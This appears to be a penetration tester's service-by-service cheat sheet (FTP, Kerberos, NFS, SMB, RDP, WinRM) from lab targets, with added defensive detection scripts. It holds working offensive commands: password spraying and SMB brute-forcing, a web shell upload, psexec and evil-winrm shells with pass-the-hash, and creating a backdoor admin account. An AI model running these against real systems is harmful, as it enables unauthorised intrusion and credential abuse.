Services
FTP (port 21)
Anonymous login
nmap -p 21 --script=ftp-anon 10.10.174.58
Download everything (mirror the whole tree; the credentials end up in shell history and in ps while wget runs, so on a real engagement put them in ~/.netrc or use --ask-password instead)
wget -m --user='USERNAME' --password='PASSWORD' ftp://127.0.0.1
Kerberos (port 88)
Enumeration & bruteforce
Kerbrute has four main commands:
- bruteuser - bruteforce a single user's password from a wordlist
- bruteforce - read username:password combos from a file or stdin and test them
- passwordspray - test a single password against a list of users
- userenum - enumerate valid domain usernames via Kerberos
userenum sends AS-REQs without pre-authentication, so it does not count against the lockout threshold. The three password-guessing modes do, and every failed guess is logged on the DC as Event ID 4771 (Kerberos pre-authentication failed), so read the lockout policy before spraying.
See AD - enumeration.
RPC / NFS (port 111, 2049, 20048)
Interesting files: /etc/nfs.conf, /etc/fstab and /etc/exports (the last one tells you which clients may mount which path and whether remote root is squashed).
$ rpcinfo -p | grep nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
Nmap NSE:
$ sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.220.222
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-30 13:48 CET
Nmap scan report for 10.10.220.222
Host is up (0.035s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836532.0 6877096.0 22% 16.0T 32000
Nmap done: 1 IP address (1 host up) scanned in 2.38 seconds
List the exports and mount one:
$ showmount -e 10.10.200.32
Export list for 10.10.200.32:
/home/ubuntu/sharedfolder *
/tmp *
/home/backup *
$ sudo mkdir /mnt/nfs1
$ sudo mount -t nfs -o rw 10.10.200.32:/home/ubuntu/sharedfolder /mnt/nfs1
$ cd /mnt/nfs1
...
Mount the NFS export:
$ sudo mkdir /mnt/nfs2
$ sudo mount -t nfs 10.10.220.222:/var /mnt/nfs2
$ cd /mnt/nfs2
$ ls
backups cache crash lib local lock log mail opt run snap spool tmp www
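An added check of my own, not part of the original notes: once you have /etc/exports from a mounted share (or the export list printed by showmount -e), the combinations worth acting on are an export open to every host (*), no_root_squash (remote root keeps uid 0, so anything you write as root on the mount, including a setuid binary, is root-owned on the server) and insecure (client source ports above 1024 accepted). The function below reads either format from stdin and prints one line per risky export. The function name, the flag words and the sample export list are constructed for this example.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes): flag NFS exports worth a
# closer look. Input is either /etc/exports or the list printed by
# `showmount -e`; both have the form
#   <path> <client>[(options)] [<client>[(options)] ...]
# Flags raised (names chosen for this example):
#   world          client is "*": any host that reaches port 2049 can mount it
#   no_root_squash remote root stays uid 0 on the export, so root-owned files
#                  (including setuid binaries) can be written from the client
#   insecure       server accepts source ports >1024, so an unprivileged user
#                  on a permitted client can talk to the server directly
risky_exports() {
  awk '
    NF == 0 || $1 ~ /^#/ || $1 !~ /^\// { next }   # skip blanks, comments and the "Export list for ..." header
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        client = $i; opts = ""
        if (match(client, /\(.*\)/)) {             # split "host(opt,opt)" into host and option list
          opts = substr(client, RSTART + 1, RLENGTH - 2)
          client = substr(client, 1, RSTART - 1)
        }
        if (client == "") client = "*"             # "/srv (rw)" exports to everyone
        flags = ""
        if (client == "*") flags = flags " world"
        if (opts ~ /(^|,)no_root_squash(,|$)/) flags = flags " no_root_squash"
        if (opts ~ /(^|,)insecure(,|$)/) flags = flags " insecure"
        if (flags != "") printf "%s %s%s\n", path, client, flags
      }
    }'
}

# Constructed sample in /etc/exports syntax (not a real host's file).
SAMPLE_EXPORTS='/home/ubuntu/sharedfolder *(rw,sync,no_root_squash,no_subtree_check)
/tmp *(rw,sync)
/home/backup 10.10.200.0/24(ro,sync,root_squash)
/var *(rw,insecure)'

# Against a live target:  showmount -e 10.10.200.32 | risky_exports
printf '%s\n' "$SAMPLE_EXPORTS" | risky_exports
```

The showmount form carries no options, so only the world flag can fire on it; the real verdict on root squashing needs /etc/exports itself, which is why the file is on the interesting-files list.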
Samba (port 139, 445)
List shares
$ sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.220.222
[...]
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.220.222\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 2
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
[...]
$ crackmapexec smb 10.10.86.204 --shares
$ smbclient -L 10.10.86.204
Password for [MYGROUP\xanhacks]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
Download / upload files
$ smbclient -U 'guest' '\\10.10.86.204\nt4wrksv'
Password for [MYGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 25 23:46:04 2020
.. D 0 Sat Jul 25 23:46:04 2020
passwords.txt A 98 Sat Jul 25 17:15:33 2020
7735807 blocks of size 4096. 4932712 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> mput shell.aspx
Put file shell.aspx? y
putting file shell.aspx as \shell.aspx (40.5 kb/s) (average 40.5 kb/s)
Recursive download
Recursively download all the files of the share using smbget -R:
$ smbget -R smb://10.10.220.222/anonymous
Password for [xanhacks] connecting to //anonymous/10.10.220.222: <press enter>
Using workgroup WORKGROUP, user xanhacks
smb://10.10.220.222/anonymous/log.txt
Downloaded 11.95kB in 1 seconds
Bruteforce SMB
Given two files, cme tries every user against every password, so read the lockout policy first (cme's --pass-pol option prints it with a valid or null credential) and keep the attempts per user below the threshold. --no-bruteforce pairs line N of the user file with line N of the password file instead, and --continue-on-success keeps going after the first hit.
$ cme smb 10.10.10.182 -u users.lst -p passwords.list
[...]
Shell over SMB (psexec.py)
How does psexec.py work?
- Connects to the target over SMB with local-administrator credentials (needed to write to ADMIN$ and to create services).
- Uploads a service binary to the ADMIN$ share (C:\Windows): Sysinternals PsExec pushes PSEXESVC.EXE, while Impacket's psexec.py pushes a copy of its RemComSvc under a random name.
- Registers and starts that binary as a service through the Service Control Manager; the service relays the shell's input and output over a named pipe.
The service installation is written to the System log as Event ID 7045 and the binary touches disk, so this is one of the louder ways to get a shell.
$ cme smb 10.10.10.182 -u administrator -p 'pass123'
SMB ... (Pwn3d!)
$ psexec.py administrator:pass123@10.10.10.182
[...]
C:\Windows\system32>
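For the defender's side of that flow, here is an added example that is not part of the original notes: both Sysinternals PsExec and Impacket's psexec.py drop a service binary into ADMIN$ (C:\Windows) and register it with the Service Control Manager, which the System log records as Event ID 7045. Legitimate service binaries almost never live directly in C:\Windows (they sit in System32 or under Program Files), so that path, or the literal PSEXESVC.exe name, is a cheap triage rule over an exported log. The pipe-separated input layout, the function name and the sample events are my assumptions for this example; the random service and binary names in the sample mimic what psexec.py generates.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes): triage Event ID 7045
# ("A service was installed in the system") records for PsExec-style
# service installs. Input: one event per line,
#   EventID|ServiceName|ImagePath|Account
# (an assumed layout, e.g. a CSV export of Get-WinEvent reshaped with '|').
flag_psexec_services() {
  awk -F '|' '
    NF < 3 || $1 != "7045" { next }                # only service-install events
    {
      path = $3
      gsub(/"/, "", path)                          # strip quotes around paths with spaces
      lp = tolower(path)
      reason = ""
      if (lp ~ /\\psexesvc\.exe$/)
        reason = "Sysinternals PsExec service binary"
      else if (lp ~ /^(%systemroot%|c:\\windows)\\[^\\]+$/)   # file directly in C:\Windows, no subdirectory
        reason = "service binary dropped directly in %SystemRoot% (ADMIN$ root)"
      if (reason != "") printf "%s|%s|%s\n", $2, path, reason
    }'
}

# Constructed sample export, not from a real host. Line 2 mimics psexec.py,
# which picks a random service name and a random binary name.
SAMPLE_7045='7045|PSEXESVC|%SystemRoot%\PSEXESVC.exe|LocalSystem
7045|gXqT|%systemroot%\RmyKDpEl.exe|LocalSystem
7045|Spooler|C:\Windows\System32\spoolsv.exe|LocalSystem
7045|VMTools|"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"|LocalSystem
7036|gXqT|entered the running state|-'

printf '%s\n' "$SAMPLE_7045" | flag_psexec_services
```

The rule is deliberately narrow: it says nothing about services installed elsewhere, and the two hits it does produce should still be checked against the account that created them (the 4th field) and against the SMB logon that preceded them on the same host.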
CIFS (port 445)
CIFS (Common Internet File System) is the name Microsoft gave to the SMB 1.0 dialect it documented in the late 1990s, when vendors wanted an Internet Protocol-based file-sharing protocol.
CIFS is now obsolete: modern systems use SMB 2.0 and 3.0, which were major upgrades, and SMB1 is disabled by default on current Windows. The Linux kernel client kept the name, but mount -t cifs negotiates SMB 2.1/3.x on modern kernels; use the vers= option (for example vers=1.0) only when a legacy server refuses anything newer.
Mount a share
$ sudo mkdir /mnt/data
$ sudo mount -t cifs -o 'user=r.thompson,password=admin123' //10.10.10.182/Data /mnt/data
A password on the command line lands in shell history and is visible in ps while mount runs; mount.cifs also accepts -o credentials=FILE, where FILE (mode 600) holds username=, password= and optionally domain= lines.
RDP (port 3389)
A Windows user needs to be a member of the Remote Desktop Users or Administrators group to use RDP. To create a local account with RDP access (noisy: the new account logs Event ID 4720 and each group change logs 4732; Administrators alone already grants RDP, so the last line is only needed for a non-admin account):
net user USERNAME PASSWORD /add
net localgroup Administrators USERNAME /add
net localgroup "Remote Desktop Users" USERNAME /add
RDP using rdesktop:
$ rdesktop -u <username> -p <password> <ip>
Remmina is a GUI alternative.
WinRM (port 5985)
A Windows user needs to be a member of the Remote Management Users or Administrators group to use WinRM.
You can use evil-winrm to obtain a remote shell.
To check whether the credentials give WinRM access:
$ cme winrm 10.200.10.196 -u administrator -p 'pass123'
WINRM ... (Pwn3d!)
Gain a shell with the password, or pass the hash with the NT hash (-H):
$ evil-winrm -i 10.200.10.196 -u administrator -p 'pass123'
$ evil-winrm -i 10.200.10.196 -u administrator -H '37db630168e5f82aafa8461e05c6bbd1'